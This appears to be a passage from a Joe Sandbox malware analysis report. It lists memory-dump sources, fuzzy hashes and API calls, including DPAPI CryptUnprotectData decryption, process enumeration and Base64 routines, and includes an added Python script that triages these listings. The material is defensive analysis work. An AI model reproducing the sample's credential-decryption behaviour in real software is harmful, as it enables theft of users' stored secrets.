                             • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 523283f22922fa9d70ac0861b4207fbcf72d3164b3080afd81b4589f7997e5ec
                            • Instruction ID: 1a7d03c437771fe632f7f6efa67082b19c3fad16cbc014f82609d1599bf88c30
                            • Opcode Fuzzy Hash: 523283f22922fa9d70ac0861b4207fbcf72d3164b3080afd81b4589f7997e5ec
                            • Instruction Fuzzy Hash: 4131B575A00219ABDB109B58EC45FEFBBBDDF84705F0441A5FA09E3280DBB15A048BB1
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00B240CD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00B240DC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B240E3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00B24113
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                             • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            • Opcode ID: 55894c795e0f8fb142693406b290d1dfbeae6ae06666223dcc18511b0b6360c0
                            • Instruction ID: 663919c185b7e8965fe5e3161aa699bc7e3220014cd2d4618ad9b2d1a4e18c09
                            • Opcode Fuzzy Hash: 55894c795e0f8fb142693406b290d1dfbeae6ae06666223dcc18511b0b6360c0
                            • Instruction Fuzzy Hash: 28011E71600315ABDB109FA5EC95B6BBBADEF45311F108199BD09D7340DB719940CB64
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00B09B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B09B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00B09B61
                            • LocalFree.KERNEL32 ref: 00B09B70
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                             • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: fd322b13c93607f2784e7547264e986f03a8dc5780b37ddcea3241bde04d02e4
                            • Instruction ID: 0d32c97cf85d9872fa24b446c0ef8c2fc7d30e86c3e106e654be403a9cdf0df0
                            • Opcode Fuzzy Hash: fd322b13c93607f2784e7547264e986f03a8dc5780b37ddcea3241bde04d02e4
                            • Instruction Fuzzy Hash: BBF0BD703443126BE7305F65AC5AF56BFA8EF04B61F240554FA45EA3D0D7B49840CAA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                             • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: OT8$o^?]$~~k
                            • API String ID: 0-3998585715
                            • Opcode ID: d850e5bccaf94c9ae20fc9d45b5f1cfa80a84280bce6e122cf94b507c060ed2b
                            • Instruction ID: 6cc3b3cd5830bcb20150794482810c9e4f76ae5991f657154d3611c41c98fca7
                            • Opcode Fuzzy Hash: d850e5bccaf94c9ae20fc9d45b5f1cfa80a84280bce6e122cf94b507c060ed2b
                            • Instruction Fuzzy Hash: BCB216F3A0C204AFE3046E29DC4567ABBE5EF94720F1A893DEAC5C7744EA3558018797
                            APIs
                            • CoCreateInstance.COMBASE(00B2B110,00000000,00000001,00B2B100,?), ref: 00B1CB06
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00B1CB46
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 00B1CBC9
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                             • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            • Opcode ID: 8f66ef3fbd06d47111dd531aa7b908046122e183a904a828648eb09c943850c4
                            • Instruction ID: 2821be7bc9d505226800a9a97ba32c64ba8a545fea8f7b9db66eada0783806df
                            • Opcode Fuzzy Hash: 8f66ef3fbd06d47111dd531aa7b908046122e183a904a828648eb09c943850c4
                            • Instruction Fuzzy Hash: 78315771A406186FD710DB94DC92FAA77B59B88B11F1041C4BA04EB2D0D7B0AD44CBA0
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B09B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00B09BB3
                            • LocalFree.KERNEL32(?), ref: 00B09BD7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                             • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 17446e2cf64f329f1d61ed759d197b24393a1a4a001de9bf2a175d2e4dc672b7
                            • Instruction ID: 85ce9c17bdbe5b8517a3790de1bd5086197c6f39a656bbcd5bf4c56f066eb04b
                            • Opcode Fuzzy Hash: 17446e2cf64f329f1d61ed759d197b24393a1a4a001de9bf2a175d2e4dc672b7
                            • Instruction Fuzzy Hash: A7011D75A41309ABD7109BA4DC55FAEB7B8EB44B00F104554FA04EB381E7B09E00CBE1
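                             The "APIs" bullets above are the most useful part of each function listing for triage: the Toolhelp32 walk at 00B23A96 (CreateToolhelp32Snapshot with TH32CS_SNAPPROCESS = 0x2, then Process32First/Process32Next), the two crypt32 conversion routines at 00B240CD and 00B09B3B that each call the same API twice around an allocation, and the CryptUnprotectData routine at 00B09B9F. The script below is an added example, not Joe Sandbox code and not code from the analysed sample: it parses bullets in the format shown on this page (the format is inferred from these lines, including the sub-call prefix and the parenthesis-less "LocalFree.KERNEL32 ref:" form), decodes the dwFlags stack slot of CryptBinaryToStringA/CryptStringToBinaryA using the wincrypt.h constants, tags capabilities by API set, and flags the size-query-then-fill idiom. The four sample listings are copied from this report's bullets; where Joe Sandbox printed "?" for an unresolved stack value, the flag is reported as unresolved rather than guessed.

```python
"""Triage helper for the per-function "APIs" bullets of a Joe Sandbox listing.

Added example, not code from Joe Sandbox or from the analysed sample. The bullet
format is inferred from the listings on this page; SAMPLE_LISTINGS copies four of
those bullet groups verbatim so the script runs offline. dwFlags positions follow
the documented crypt32 prototypes; Joe Sandbox prints '?' where it could not
resolve a stack value, and such flags are reported as unresolved."""
import re

# One API bullet. Sub-call bullets carry "Part of subcall function XXXXXXXX:".
# "LocalFree.KERNEL32 ref: ..." shows the argument list and the comma are optional.
API_LINE = re.compile(
    r"^\s*\u2022\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# dwFlags values for CryptBinaryToStringA / CryptStringToBinaryA (wincrypt.h).
CRYPT_STRING_FORMATS = {
    0x0: "BASE64HEADER", 0x1: "BASE64", 0x2: "BINARY", 0x3: "BASE64REQUESTHEADER",
    0x4: "HEX", 0x5: "HEXASCII", 0x6: "BASE64_ANY", 0x7: "ANY", 0x8: "HEX_ANY",
    0x9: "BASE64X509CRLHEADER", 0xA: "HEXADDR", 0xB: "HEXASCIIADDR", 0xC: "HEXRAW",
}
CRYPT_STRING_MODIFIERS = {0x20000000: "STRICT", 0x40000000: "NOCRLF", 0x80000000: "NOCR"}
FLAG_ARG_INDEX = {"CryptBinaryToStringA": 2, "CryptStringToBinaryA": 2}  # dwFlags slot
ALLOCATORS = {"LocalAlloc", "RtlAllocateHeap", "HeapAlloc", "VirtualAlloc"}

# API sets that identify a capability; every member must appear in the listing.
CAPABILITIES = [
    ({"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
     "process enumeration via Toolhelp32 snapshot"),
    ({"CryptUnprotectData"}, "DPAPI decryption of a locally protected blob"),
    ({"CryptStringToBinaryA"}, "string-to-binary decoding"),
    ({"CryptBinaryToStringA"}, "binary-to-string encoding"),
    ({"CoCreateInstance"}, "COM object instantiation"),
]


def decode_crypt_string_flags(value):
    """Name the format and modifier bits of a CRYPT_STRING_* dwFlags value."""
    names = [CRYPT_STRING_FORMATS.get(value & 0xFF, "UNKNOWN_FORMAT(0x%x)" % (value & 0xFF))]
    names += [n for bit, n in CRYPT_STRING_MODIFIERS.items() if value & bit]
    leftover = value & ~(0xFF | sum(CRYPT_STRING_MODIFIERS)) & 0xFFFFFFFF
    if leftover:
        names.append("UNKNOWN_BITS(0x%x)" % leftover)
    return "|".join("CRYPT_STRING_" + n for n in names)


def parse_listing(text):
    """Return one dict per API bullet: api, module, args, ref, subcall."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            calls.append({"api": m.group("api"), "module": m.group("mod"),
                          "args": [a.strip() for a in raw.split(",")] if raw else [],
                          "ref": m.group("ref"), "subcall": m.group("sub")})
    return calls


def summarize(text):
    """Classify one function listing: capabilities, decoded flags, allocation idiom."""
    calls = parse_listing(text)
    direct = [c for c in calls if c["subcall"] is None]
    apis = {c["api"] for c in calls}
    flags = {}
    for c in direct:
        idx = FLAG_ARG_INDEX.get(c["api"])
        if idx is not None and idx < len(c["args"]):
            arg = c["args"][idx]
            flags[c["ref"]] = "unresolved" if arg == "?" else decode_crypt_string_flags(int(arg, 16))
    # The same conversion API called twice with an allocation between the calls is the
    # size-query-then-fill idiom: the first call only reports the required buffer length.
    seq = [c["api"] for c in direct]
    size_query = any(
        seq[i] == seq[j] and seq[i] in FLAG_ARG_INDEX and ALLOCATORS & set(seq[i + 1:j])
        for i in range(len(seq)) for j in range(i + 1, len(seq))
    )
    return {"apis": sorted(apis),
            "capabilities": [label for needed, label in CAPABILITIES if needed <= apis],
            "flags": flags, "size_query_idiom": bool(size_query)}


# Constructed input: four bullet groups copied from this report's function listings.
SAMPLE_LISTINGS = {
    "proc_enum": """
• Part of subcall function 00B271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00B271FE
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B23A96
• Process32First.KERNEL32(00000000,00000128), ref: 00B23AA9
• Process32Next.KERNEL32(00000000,00000128), ref: 00B23ABF
• CloseHandle.KERNEL32(00000000), ref: 00B23BF7
""",
    "b64_encode": """
• CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00B240CD
• GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00B240DC
• RtlAllocateHeap.NTDLL(00000000), ref: 00B240E3
• CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00B24113
""",
    "b64_decode": """
• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00B09B3B
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00B09B4A
• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00B09B61
• LocalFree.KERNEL32 ref: 00B09B70
""",
    "dpapi": """
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B09B9F
• LocalAlloc.KERNEL32(00000040,?), ref: 00B09BB3
• LocalFree.KERNEL32(?), ref: 00B09BD7
""",
}

if __name__ == "__main__":
    for name, listing in SAMPLE_LISTINGS.items():
        print(name, summarize(listing))
```

                             Running it over the four listings reports 0x40000001 at 00B240CD as CRYPT_STRING_BASE64|CRYPT_STRING_NOCRLF (single-line Base64 output) and 0x1 at 00B09B3B as CRYPT_STRING_BASE64, marks both conversion routines as using the size-query idiom, and tags the 00B23A96 routine as a Toolhelp32 process walk. The LocalAlloc flag 0x40 seen in the decode and DPAPI routines is LMEM_ZEROINIT, which the script does not decode. Note that the routine at 00B0EA76 on this page shows "?" in the dwFlags slot of CryptStringToBinaryA, so for it the parser would report the flag as unresolved; that is a limit of the sandbox's stack reconstruction, not evidence of a different format.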
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                             • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 4?m$}?
                            • API String ID: 0-2831152445
                            • Opcode ID: a0e2869c74d863230595f9453a250cf4f3f1b1e8ef321fb5a058b1dd3985131f
                            • Instruction ID: 01a2ebace0fbb31f1435bcea1d5893f7a09f2ef9cdc07511d66e779e6d6df6f3
                            • Opcode Fuzzy Hash: a0e2869c74d863230595f9453a250cf4f3f1b1e8ef321fb5a058b1dd3985131f
                            • Instruction Fuzzy Hash: 9C716AF3A087088FE704AE3EDC8536AFBD6EB94320F164A3DE9D4D7744E93958018652
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Sa?=
                            • API String ID: 0-2975840362
                            • Opcode ID: 78f8c1732fea79dee3d59afe3d84c64fb7e73568393622b7efe4bcf1bf633cfd
                            • Instruction ID: db29e03cba9cdc9232fa36f361b0325f4fe2cfd8f3b38c08b6d3c59868fb18ca
                            • Opcode Fuzzy Hash: 78f8c1732fea79dee3d59afe3d84c64fb7e73568393622b7efe4bcf1bf633cfd
                            • Instruction Fuzzy Hash: 22714AF3A181105BE3086E3DEC1977BBBD9DF94320F1A063DEAD9D3380E57999158282
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: fphW
                            • API String ID: 0-869481067
                            • Opcode ID: f4cd47bcd8067c97599a290bd498d091cbb23fa7dd774f661ebc7cf3040a60e5
                            • Instruction ID: 8e59896f4ef531f7059f3abe2dd661d3112c90f7e92c3517a3dc9036ed82eb14
                            • Opcode Fuzzy Hash: f4cd47bcd8067c97599a290bd498d091cbb23fa7dd774f661ebc7cf3040a60e5
                            • Instruction Fuzzy Hash: 8D518CF26086009FE718BF28DC8676AB7E5EB94310F06492CE6D5C7380EA7599548B87
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: +C\
                            • API String ID: 0-2958185382
                            • Opcode ID: db48fd046f26ebe2174d1cb51741850f5382e004946fa5ce5c03af473c72a70b
                            • Instruction ID: 95bcb86e12bb2155a3d57987122cd926664d25bee9eb49226d8d1f2251cd06bb
                            • Opcode Fuzzy Hash: db48fd046f26ebe2174d1cb51741850f5382e004946fa5ce5c03af473c72a70b
                            • Instruction Fuzzy Hash: BF315BF7A0C6089BE314792DDC4977BB7D5DBD0720F1A463EE698C3350F97558054292
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a298751145c1879cd4e69cb3aaf5ee5705f77e84284544d1e7a89825fd7c00f4
                            • Instruction ID: 29fb4a2659f2f47b4b9cdbf3e2908dcefa5c90677618526c1b37e2ac77b55a16
                            • Opcode Fuzzy Hash: a298751145c1879cd4e69cb3aaf5ee5705f77e84284544d1e7a89825fd7c00f4
                            • Instruction Fuzzy Hash: 4C615AF3A186109BD3186E2CEC9577ABBDAEBD4320F1A893DE6C5D3784E53548048682
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a9cdd5d8edcb5e5e2a6b45e3f07eb7557a09e0b42e2ca5b47fd65412e7ab66f
                            • Instruction ID: 2acf749efc67effb7303c7346eec7323dcccb7eedd9954933fba1e1031eb34db
                            • Opcode Fuzzy Hash: 1a9cdd5d8edcb5e5e2a6b45e3f07eb7557a09e0b42e2ca5b47fd65412e7ab66f
                            • Instruction Fuzzy Hash: FB513BF3E086140FF304A969EC4573AB3DAEBC4320F2A863DDE9997384E9791D0542D2
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
